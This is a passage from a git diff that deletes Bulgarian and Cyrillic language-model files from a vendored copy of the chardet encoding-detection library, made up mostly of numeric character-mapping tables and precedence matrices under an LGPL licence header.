-2,2,1,1,1,1,1,2,2,2,1,0,2,0,1,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0, -3,3,3,3,2,2,2,2,2,0,2,1,1,1,1,2,1,2,1,1,0,2,0,1,0,1,0,0,2,0,1,2, -1,1,1,1,1,1,1,2,2,1,1,0,2,0,1,0,2,0,0,1,1,1,0,0,2,0,0,0,1,1,0,0, -2,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,2,0,0,1,1,0,0,0,0,0,0,1,2,0,1,2, -2,2,2,1,1,2,1,1,2,2,2,1,2,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,1,1,0,0, -2,3,3,3,3,0,2,2,0,2,1,0,0,0,1,1,1,2,0,2,0,0,0,3,0,0,0,0,2,0,2,2, -1,1,1,2,1,2,1,1,2,2,2,1,2,0,1,1,1,0,1,1,1,1,0,2,1,0,0,0,1,1,0,0, -2,3,3,3,3,0,2,1,0,0,2,0,0,0,0,0,1,2,0,2,0,0,0,0,0,0,0,0,2,0,1,2, -1,1,1,2,1,1,1,1,2,2,2,0,1,0,1,1,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0, -3,3,2,2,3,0,1,0,1,0,0,0,0,0,0,0,1,1,0,3,0,0,0,0,0,0,0,0,1,0,2,2, -1,1,1,1,1,2,1,1,2,2,1,2,2,1,0,1,1,1,1,1,0,1,0,0,1,0,0,0,1,1,0,0, -3,1,0,1,0,2,2,2,2,3,2,1,1,1,2,3,0,0,1,0,2,1,1,0,1,1,1,1,2,1,1,1, -1,2,2,1,2,1,2,2,1,1,0,1,2,1,2,2,1,1,1,0,0,1,1,1,2,1,0,1,0,0,0,0, -2,1,0,1,0,3,1,2,2,2,2,1,2,2,1,1,1,0,2,1,2,2,1,1,2,1,1,0,2,1,1,1, -1,2,2,2,2,2,2,2,1,2,0,1,1,0,2,1,1,1,1,1,0,0,1,1,1,1,0,1,0,0,0,0, -2,1,1,1,1,2,2,2,2,1,2,2,2,1,2,2,1,1,2,1,2,3,2,2,1,1,1,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,3,2,0,1,2,0,1,2,1,1,0,1,0,1,2,1,2,0,0,0,1,1,0,0,0,1,0,0,2, -1,1,0,0,1,1,0,1,1,1,1,0,2,0,1,1,1,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0, -2,0,0,0,0,1,2,2,2,2,2,2,2,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,2,1,1,1, -1,2,2,2,2,1,1,2,1,2,1,1,1,0,2,1,2,1,1,1,0,2,1,1,1,1,0,1,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0, -1,1,0,1,0,1,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,3,2,0,0,0,0,1,0,0,0,0,0,0,1,1,0,2,0,0,0,0,0,0,0,0,1,0,1,2, -1,1,1,1,1,1,0,0,2,2,2,2,2,0,1,1,0,1,1,1,1,1,0,0,1,0,0,0,1,1,0,1, -2,3,1,2,1,0,1,1,0,2,2,2,0,0,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,2, -1,1,1,1,2,1,1,1,1,1,1,1,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0, -2,2,2,2,2,0,0,2,0,0,2,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,2,0,2,2, -1,1,1,1,1,0,0,1,2,1,1,0,1,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,0,2,0,1,1,0,0,0,1,0,0,2,0,2,0,0,0,0,0,0,0,0,0,0,1,1, -0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,3,2,0,0,1,0,0,1,0,0,0,0,0,0,1,0,2,0,0,0,1,0,0,0,0,0,0,0,2, -1,1,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -2,1,2,2,2,1,2,1,2,2,1,1,2,1,1,1,0,1,1,1,1,2,0,1,0,1,1,1,1,0,1,1, -1,1,2,1,1,1,1,1,1,0,0,1,2,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0, -1,0,0,1,3,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,2,1,0,0,1,0,2,0,0,0,0,0,1,1,1,0,1,0,0,0,0,0,0,0,0,2,0,0,1, -0,2,0,1,0,0,1,1,2,0,1,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,1,1,0,2,1,0,1,1,1,0,0,1,0,2,0,1,0,0,0,0,0,0,0,0,0,1, -0,1,0,0,1,0,0,0,1,1,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -2,2,2,2,2,0,0,1,0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1, -0,1,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -2,0,1,0,0,1,2,1,1,1,1,1,1,2,2,1,0,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0, -1,1,2,1,1,1,1,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,2,1,2,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1, -0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,2,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0, -0,1,1,0,1,1,1,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0, -1,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,0,2,0,0,2,0,1,0,0,1,0,0,1, -1,1,0,0,1,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0, -1,1,1,1,1,1,1,2,0,0,0,0,0,0,2,1,0,1,1,0,0,1,1,1,0,1,0,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,1,1,0,1,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -) - -Latin5BulgarianModel = { \ - 'charToOrderMap': Latin5_BulgarianCharToOrderMap, - 'precedenceMatrix': BulgarianLangModel, - 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': constants.False, - 'charsetName': "ISO-8859-5" -} - -Win1251BulgarianModel = { \ - 'charToOrderMap': win1251BulgarianCharToOrderMap, - 'precedenceMatrix': BulgarianLangModel, - 'mTypicalPositiveRatio': 0.969392, - 'keepEnglishLetter': constants.False, - 'charsetName': "windows-1251" -} diff --git a/chardet/chardet/langbulgarianmodel.pyc b/chardet/chardet/langbulgarianmodel.pyc deleted file mode 100644 index 65b8196..0000000 Binary files a/chardet/chardet/langbulgarianmodel.pyc and /dev/null differ diff --git a/chardet/chardet/langcyrillicmodel.py b/chardet/chardet/langcyrillicmodel.py deleted file mode 100644 index ab051f2..0000000 --- a/chardet/chardet/langcyrillicmodel.py +++ /dev/null @@ -1,329 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -# KOI8-R language model -# Character Mapping Table: -KOI8R_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80 -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90 -223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0 -238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0 - 27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0 - 15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0 - 59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0 - 35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0 -) - -win1251_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, -239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253, - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, -) - -latin5_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, -239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, -) - -macCyrillic_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, -239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255, -) - -IBM855_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205, -206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70, - 3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219, -220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229, -230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243, - 8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248, - 43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249, -250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255, -) - -IBM866_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, -239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 97.6601% -# first 1024 sequences: 2.3389% -# rest sequences: 0.1237% -# negative sequences: 0.0009% -RussianLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2, -3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1, -0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1, -0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1, -1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1, -1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0, -2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1, -1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0, -3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1, -1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0, -2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2, -1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1, -1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1, -1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0, -2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1, -1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0, -3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2, -1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1, -2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1, -1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0, -2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1, -1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0, -1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1, -1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0, -3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1, -2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1, -3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1, -1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1, -1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1, -0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0, -2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1, -1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0, -1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1, -0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, 